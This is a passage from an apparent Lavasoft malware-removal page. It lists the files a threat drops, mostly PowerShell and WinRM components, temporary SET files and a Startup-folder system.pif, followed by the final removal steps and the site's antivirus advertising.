    C:\95cb07fb380b69f02f8492ce2d5a\about_arithmetic_operators.help.txt (168 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_bits_cmdlets.help.txt (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_core_commands.help.txt (221 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_foreach.help.txt (10 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_history.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_pssession_details.help.txt (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_ws-management_cmdlets.help.txt (405 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\bitstransfer.format.ps1xml (16 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_split.help.txt (10 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_execution_policies.help.txt (13 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmres.dll (6164 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\importallmodules.psd1 (438 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_for.help.txt (146 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\$shtdwn$.req (788 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_script_internationalization.help.txt (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\powershelltrace.format.ps1xml (344 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\eventforwarding.adm (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_functions.help.txt (586 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_windows_powershell_2.0.help.txt (453 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_types.ps1xml.help.txt (481 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\default.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\registry.format.ps1xml (20 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmplpxy.dll (603 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_hash_tables.help.txt (6 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_session_configurations.help.txt (276 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\kb968930xp.cat (512 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_regular_expressions.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\profile.ps1 (772 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_escape_characters.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_special_characters.help.txt (3 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrm.vbs (2727 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_environment_variables.help.txt (417 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_requires.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_job_details.help.txt (824 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_commonparameters.help.txt (12 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_parsing.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pwrshsip.dll (24 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_command_syntax.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_break.help.txt (792 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\windowsremoteshell.adm (12 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_logical_operators.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.editor.resources.dll (562 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_comparison_operators.help.txt (11 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_scripts.help.txt (12 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\spcustom.dll (23 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_scopes.help.txt (76 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.wsman.runtime.dll (33 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.security.resources.dll (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrm.ini (1956 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_format.ps1xml.help.txt (17 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_parameters.help.txt (9 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_data_sections.help.txt (5 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\microsoft.powershell.gpowershell.dll (9738 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_try_catch_finally.help.txt (7 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\update\eula.txt (586 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wsmtxt.xsl (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\certificate.format.ps1xml (155 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\windowsremotemanagement.adm (574 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_switch.help.txt (489 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrmprov.mof (789 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\about_redirection.help.txt (2 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\winrs.exe (1154 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\wtrinstaller.ico (4803 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\help.format.ps1xml (3947 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\diagnostics.format.ps1xml (590 bytes)
    C:\95cb07fb380b69f02f8492ce2d5a\pscustomsetuputil.exe (316 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startupx\system.pif (1425 bytes)
    %System%\SETBF.tmp (42 bytes)
    %System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
    %System%\SET12.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
    %System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
    %System%\SETC.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
    %System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
    %System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
    %System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
    %System%\SET2D.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
    %System%\SET25.tmp (1281 bytes)
    %System%\SET13.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
    %System%\SET20.tmp (2 bytes)
    %System%\SET14.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
    %System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
    %WinDir%\inf\SET32.tmp (38 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
    %System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
    %System%\SET2A.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
    %System%\SET7.tmp (35 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
    %System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
    %System%\SET22.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
    %System%\spmsg.dll (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
    %System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
    %System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
    %System%\SET2B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
    %WinDir%\inf\SET18.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
    %System%\SETE.tmp (22 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (7641 bytes)
    %System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
    %System%\SET6.tmp (2 bytes)
    %System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
    %System%\wbem\SET4.tmp (4 bytes)
    %System%\SET17.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
    %System%\SETA.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
    %System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
    %System%\config\SYSTEM.LOG (8521 bytes)
    %System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
    %System%\SET27.tmp (601 bytes)
    %System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
    %System%\SET11.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
    %System%\SET8.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
    %System%\SETF.tmp (1281 bytes)
    %System%\SET10.tmp (2 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
    %System%\SET26.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
    %System%\SET21.tmp (35 bytes)
    %System%\config\system (4276 bytes)
    %System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
    %System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
    %System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
    %System%\SET16.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
    %System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
    %System%\CatRoot2\dberr.txt (1499 bytes)
    %WinDir%\inf\oem11.PNF (13062 bytes)
    %System%\SETB.tmp (1281 bytes)
    %System%\SET1F.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
    %System%\spupdsvc.exe (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
    %System%\SET28.tmp (22 bytes)
    %System%\SET5.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
    %System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
    %System%\SET31.tmp (673 bytes)
    %System%\SET2E.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
    %System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
    %System%\SET29.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
    %System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
    %System%\SET2C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
    %WinDir%\KB968930.log (240837 bytes)
    %System%\SET15.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
    %System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
    %System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
    %System%\SET24.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
    %System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
    %System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
    %System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
    %WinDir%\KB968930xp.cat (59 bytes)
    %System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
    %System%\winrm\0409\SET1D.tmp (601 bytes)
    %System%\SETD.tmp (601 bytes)
    %WinDir%\inf\SET19.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
    %System%\SET9.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
    %System%\winrm\0409\SET37.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
    %System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
    %System%\SET2F.tmp (789 bytes)
    %WinDir%\Help\SETC5.tmp (12287 bytes)
    %System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
    %WinDir%\inf\oem11.inf (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
    %System%\SET30.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
    %System%\wbem\SET1E.tmp (4 bytes)
    %System%\SET23.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
    %WinDir%\inf\SET33.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
    %WinDir%\assembly\tmp\67EKQW17\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
    %WinDir%\assembly\tmp\84AFKPV0\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
    %WinDir%\assembly\tmp\98EJOUZ4\System.Management.Automation.dll (81046 bytes)
    %WinDir%\assembly\tmp\79GLRX39\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
    %WinDir%\assembly\tmp\MJPU05AF\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
    %WinDir%\assembly\tmp\CELRW28E\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
    %WinDir%\assembly\tmp\ZW27CINS\Microsoft.PowerShell.Editor.dll (32824 bytes)
    %WinDir%\assembly\tmp\GDJOTY49\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\URX27CHN\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
    %WinDir%\assembly\tmp\KLSX39FL\Microsoft.WSMan.Management.dll (9608 bytes)
    %WinDir%\assembly\tmp\QNTY38EJ\Microsoft.PowerShell.Security.resources.dll (9 bytes)
    %WinDir%\assembly\tmp\14BHNTY4\Microsoft.PowerShell.Security.dll (2392 bytes)
    %WinDir%\assembly\tmp\KFLQV05B\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\95BHMRW1\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
    %WinDir%\assembly\tmp\ECHMSX27\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
    %WinDir%\assembly\tmp\517CINSX\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\Y4BHNTZ4\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
    %WinDir%\assembly\tmp\GEKPUZ5A\System.Management.Automation.resources.dll (9320 bytes)
    %WinDir%\assembly\tmp\KKRW16BG\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
    %WinDir%\assembly\tmp\35CIOUZ5\Microsoft.WSMan.Runtime.dll (7 bytes)
    %WinDir%\assembly\tmp\NLRW16BH\Microsoft.WSMan.Management.resources.dll (13 bytes)
    %WinDir%\assembly\tmp\ZV17CHMR\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
    %WinDir%\assembly\tmp\MKQV05AG\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (2260 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (172 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now